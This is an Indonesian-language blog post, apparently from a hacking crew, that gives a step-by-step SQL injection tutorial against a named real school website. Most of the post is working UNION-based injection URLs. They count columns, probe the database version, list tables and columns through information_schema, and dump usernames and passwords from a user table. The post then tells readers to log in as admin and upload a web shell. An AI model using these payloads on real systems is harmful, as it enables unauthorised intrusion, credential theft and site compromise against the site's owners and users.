Today : | at : | Safemode : ON
English French German Spain Italian Dutch Russian Brazil Japanese Korean Arabic Chinese Simplified
Title Author Perms Comnt Modified Category
By --=:[./3r0r-c0d3]:=--
Fivers

Tutorial SQL INJECTION + Backdooring [./3r0r-c0d3] rwxr-xr-x 2 9:28:00 AM

Title Tutorial SQL INJECTION + Backdooring
Permission rw-r--r--
Author [./3r0r-c0d3]
Date and Time 9:28:00 AM
Category
Share
  SQL Injection..
 p
Okeh.. Langsung ajjah..

---->>> 1
Kita tetapkan target terlebih dahulu
contoh: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=159
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vuln.
contoh: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=159

---->>> 2
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+
contoh: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+1--
Nah.. Sekarang kita cek satu persatu.
contoh: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+1--
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+2--
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+3--
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=159+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+11--
berarti yang kita ambil adalah sampai angka 4
menjadi http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+order+by+10--

--->>> 3
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 11
maka: http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,8,9,10--
ok ,yg keluar angka 8
gunakan perintah version() untuk mengecek versi SQL yg diapakai masukan perintah tsb pada nagka yg keluar tadi
contoh:
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,version(),9,10--
lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema

--->>> 4
Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- -> dimasukan setelah angka terakhir
contoh:
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,group_concat(table_name),9,10+from+information_schema.tables+where+table_schema=database()--
seumpama yg kita cari adalah “admin” , “user” , “tb_user” , dll..

--->>> 5
Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0x(hexa)-- -> dimasukan setelah angka terakhir
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,group_concat(column_name),9,10+from+information_schema.columns+where+table_name=0x(hexa)--
pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.
Website yang di gunakan untuk konversi : http://www.string-functions.com/string-hex.aspx
contoh kata yg ingin di konversi yaitu tb-user maka akan menjadi 74625f75736572

--->>> 6
Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir
http://www.alhikmahsby.com/ind/?mod=galeri&page=1&id=-159+union+all+select+1,2,3,4,5,6,7,group_concat(username,0x3a,password,0x3a,level),9,10+from+tb_user--
Nah dah nemu ID dan password-nya sekarang.
Very Happy.. smile

ket: 0x3a sama dengan : <- titik dua --->>> 7
Mencari halaman login Admin
Login sebagai admin
Cari fitur2 upload file atau gambar, lalu upload shell kalian
ENJOY... bigsmile

Greetz : JATIMCREW, XCREW, INDONESIAN HACKER TEAM, DEVILZCODE, AND ALL
Special : All Jatimcrews ( Admin, Staff, Moderator, Global Moderator, Spam Guard, And All Member )

Share

2 komentar:

Dhenny's Woo mengatakan...

benar2 keren ne gan.....
salam

dhenyshare

[./3r0r-c0d3] mengatakan...

Makasih sobat

Posting Komentar

terimakasih telah berkomentar dengan bijak, saya harap anda memberi kritik dan saran yang membangun...

Happy Reading ^_^

Diberdayakan oleh Blogger.